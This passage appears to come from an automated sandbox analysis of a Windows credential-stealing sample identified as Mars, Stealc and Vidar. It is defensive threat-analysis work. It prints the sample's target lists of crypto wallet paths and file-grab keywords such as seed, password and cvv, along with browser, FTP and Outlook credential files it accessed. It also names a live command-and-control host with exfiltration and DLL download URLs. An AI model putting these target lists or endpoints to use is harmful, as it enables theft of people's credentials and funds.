Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: Wb9LZ5Sn1l.exe, 00000000.00000002.3112781887.0000000000447000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: |1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: Wb9LZ5Sn1l.exe, 00000000.00000002.3114165780.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: desk|%DESKTOP%\|*codes*,*2fa*,*iban*,*cards*,*banks*,*cvv*,*cvc*,*account*,*credentials*,*bitcoin*,*ethereum*,*bank*,*password*,*wallet*,*.txt,*.doc,*secret*,*.rtf, *.docx,*.xlsx,*.xls*,*.txt,*key*,*bitcoin*,*binance*,*exodus*,*coinbase*,*wallet*,*seed*,*pass*,*password*,*ledger*,*trezor*,*meta*,*metamask*,*trust*,*coin*,*crypto*|30|1|0|dock|%DOCUMENTS%\|*codes*,*2fa*,*iban*,*cards*,*banks*,*cvv*,*cvc*,*account*,*credentials*,*bitcoin*,*ethereum*,*bank*,*password*,*wallet*,*.txt,*.doc,*secret*,*.rtf, *.docx,*.xlsx,*.xls*,*.txt,*key*,*bitcoin*,*binance*,*exodus*,*coinbase*,*wallet*,*seed*,*pass*,*password*,*ledger*,*trezor*,*meta*,*metamask*,*trust*,*coin*,*crypto*|30|1|0|
Source: Wb9LZ5Sn1l.exe, 00000000.00000002.3114165780.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: desk|%DESKTOP%\|*codes*,*2fa*,*iban*,*cards*,*banks*,*cvv*,*cvc*,*account*,*credentials*,*bitcoin*,*ethereum*,*bank*,*password*,*wallet*,*.txt,*.doc,*secret*,*.rtf, *.docx,*.xlsx,*.xls*,*.txt,*key*,*bitcoin*,*binance*,*exodus*,*coinbase*,*wallet*,*seed*,*pass*,*password*,*ledger*,*trezor*,*meta*,*metamask*,*trust*,*coin*,*crypto*|30|1|0|dock|%DOCUMENTS%\|*codes*,*2fa*,*iban*,*cards*,*banks*,*cvv*,*cvc*,*account*,*credentials*,*bitcoin*,*ethereum*,*bank*,*password*,*wallet*,*.txt,*.doc,*secret*,*.rtf, *.docx,*.xlsx,*.xls*,*.txt,*key*,*bitcoin*,*binance*,*exodus*,*coinbase*,*wallet*,*seed*,*pass*,*password*,*ledger*,*trezor*,*meta*,*metamask*,*trust*,*coin*,*crypto*|30|1|0|
Source: Wb9LZ5Sn1l.exe, 00000000.00000002.3112781887.0000000000447000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: |1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: Wb9LZ5Sn1l.exe, 00000000.00000002.3112781887.0000000000447000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: |1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: Wb9LZ5Sn1l.exe, 00000000.00000002.3114165780.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: shaffatta.comtta.com/fdca69ae739b4897.php\multidoge.wallet
Source: Wb9LZ5Sn1l.exe, 00000000.00000002.3112781887.0000000000447000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: |1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: Wb9LZ5Sn1l.exe, 00000000.00000002.3112781887.0000000000447000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: |1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: Wb9LZ5Sn1l.exe, 00000000.00000002.3112781887.0000000000447000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: |1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: Wb9LZ5Sn1l.exe, 00000000.00000002.3114165780.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\\Electrum-LTC\wallets\\*.*
Tries to harvest and steal Bitcoin Wallet information
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal Jump to behavior
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe File opened: C:\Users\user\AppData\Roaming\Exodus\ Jump to behavior
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\ Jump to behavior
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\ Jump to behavior
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe File opened: C:\Users\user\AppData\Roaming\Binance\ Jump to behavior
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\ Jump to behavior
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\ Jump to behavior
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\ Jump to behavior
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\ Jump to behavior
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\ Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 Jump to behavior
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 Jump to behavior
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004 Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 00000000.00000002.3112781887.0000000000447000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Wb9LZ5Sn1l.exe PID: 6524, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Mars stealer
Source: Yara match File source: 0.3.Wb9LZ5Sn1l.exe.47a0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Wb9LZ5Sn1l.exe.2b50e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Wb9LZ5Sn1l.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Wb9LZ5Sn1l.exe.2b50e67.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.3114034341.0000000002B50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.3112781887.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2304314861.00000000047A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Yara detected Stealc
Source: Yara match File source: 00000000.00000002.3114165780.0000000002BD6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Wb9LZ5Sn1l.exe PID: 6524, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: 0.3.Wb9LZ5Sn1l.exe.47a0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Wb9LZ5Sn1l.exe.2b50e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Wb9LZ5Sn1l.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Wb9LZ5Sn1l.exe.2b50e67.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.3114034341.0000000002B50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.3112781887.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2304314861.00000000047A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.3112781887.0000000000447000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Wb9LZ5Sn1l.exe PID: 6524, type: MEMORYSTR
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CE50C40 sqlite3_bind_zeroblob, 0_2_6CE50C40
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CE50D60 sqlite3_bind_parameter_name, 0_2_6CE50D60
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CD78EA0 sqlite3_clear_bindings, 0_2_6CD78EA0
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CE50B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob, 0_2_6CE50B40
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1435816 Sample: Wb9LZ5Sn1l.exe Startdate: 03/05/2024 Architecture: WINDOWS Score: 100 22 shaffatta.com 2->22 26 Multi AV Scanner detection for domain / URL 2->26 28 Malicious sample detected (through community Yara rule) 2->28 30 Antivirus detection for URL or domain 2->30 32 6 other signatures 2->32 7 Wb9LZ5Sn1l.exe 65 2->7         started        signatures3 process4 dnsIp5 24 shaffatta.com 168.119.248.46, 443, 49709, 49710 HETZNER-ASDE Germany 7->24 14 C:\ProgramData\nss3.dll, PE32 7->14 dropped 16 C:\Users\user\AppData\...\vcruntime140[1].dll, PE32 7->16 dropped 18 C:\Users\user\AppData\...\softokn3[1].dll, PE32 7->18 dropped 20 9 other files (none is malicious) 7->20 dropped 34 Detected unpacking (changes PE section rights) 7->34 36 Detected unpacking (overwrites its own PE header) 7->36 38 Tries to steal Mail credentials (via file / registry access) 7->38 40 8 other signatures 7->40 12 WerFault.exe 19 16 7->12         started        file6 signatures7 process8
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
168.119.248.46
 shaffatta.com Germany
24940 HETZNER-ASDE true

Contacted Domains

Name IP Active
shaffatta.com 168.119.248.46 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://shaffatta.com/fdca69ae739b4897.php false
  • 12%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
https://shaffatta.com/d32e011d2eaa85a0/mozglue.dll false
  • 0%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
https://shaffatta.com/d32e011d2eaa85a0/msvcp140.dll false
  • 12%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
https://shaffatta.com/d32e011d2eaa85a0/nss3.dll false
  • 0%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
https://shaffatta.com/d32e011d2eaa85a0/freebl3.dll false
  • 7%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
https://shaffatta.com/d32e011d2eaa85a0/sqlite3.dll false
  • 0%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
https://shaffatta.com/d32e011d2eaa85a0/vcruntime140.dll false
  • 7%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
https://shaffatta.com/d32e011d2eaa85a0/softokn3.dll false
  • Avira URL Cloud: malware
 unknown